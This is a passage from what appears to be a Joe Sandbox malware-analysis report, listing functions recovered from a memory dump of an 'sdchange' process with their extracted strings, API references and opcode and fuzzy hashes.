                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: 64838e32706df2717095123fae87877ba718c24e561a17cc50ccd50083dd46a4
                                              • Instruction ID: 9090f7b6a4b2a3583c0af7803d90ef99df1443d10633cd99d3112ad93040acda
                                              • Opcode Fuzzy Hash: 64838e32706df2717095123fae87877ba718c24e561a17cc50ccd50083dd46a4
                                              • Instruction Fuzzy Hash: 034107313087029FDB20DE25DC50B6AB7E5EF84710F140A9DFA6ADB680DB72F8159B91
                                              Function 04BAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BE728C
                                              Strings
                                              • RTL: Resource at %p, xrefs: 04BE72A3
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04BE7294
                                              • RTL: Re-Waiting, xrefs: 04BE72C1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: 64ff4c82ef84e2249e73557aac7e2088991456ec28525639d2b29286dd62aafb
                                              • Instruction ID: 18fcd467c7932a850ffe05020fbe996dcb4de8aa6cb877076a4847f6bd45a6b5
                                              • Opcode Fuzzy Hash: 64ff4c82ef84e2249e73557aac7e2088991456ec28525639d2b29286dd62aafb
                                              • Instruction Fuzzy Hash: 0D41F031708206ABEB20DE25CC41B7AB7A5FB85714F100699FA65AB241DF21F8269BD1
                                              Function 04C22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 7c3db71b544ccb80507b2ba65932566b1b0401aa6b7326486af8d68272c1e8d5
                                              • Instruction ID: e5fcf8ab5c440359f11f8aafddc64a1bb051d6132271cbfb2469db00de2f2bf1
                                              • Opcode Fuzzy Hash: 7c3db71b544ccb80507b2ba65932566b1b0401aa6b7326486af8d68272c1e8d5
                                              • Instruction Fuzzy Hash: 51315472A002299FDB20DE29CD50BEFB7FDEF44614F444595E849E3240EB70BA449BA1
                                              Function 04BB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                              • Instruction ID: ab8b27af4380799c8b1a1a14c26502de50098b799f68c0288c5d167d9a633227
                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                              • Instruction Fuzzy Hash: 00919470E002459EDF24DE69C8806FEB7A5EFC4760F54459AE8D5EB2C0EBB0A94087E4
                                              Function 04B79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$@
                                              • API String ID: 0-1194432280
                                              • Opcode ID: bda5500e75ff65f709541324ef4399fe12fa91c65749965aabea39768cadc5d9
                                              • Instruction ID: 05a3d0c192428ea52a205a99d0b5952acab58aacc3a4f6ab60a27c7afa8ef9ad
                                              • Opcode Fuzzy Hash: bda5500e75ff65f709541324ef4399fe12fa91c65749965aabea39768cadc5d9
                                              • Instruction Fuzzy Hash: 6C812BB5D00269DBDB35DF54CC44BEAB7B4AB08754F0041EAE919B7640E730AE85DFA0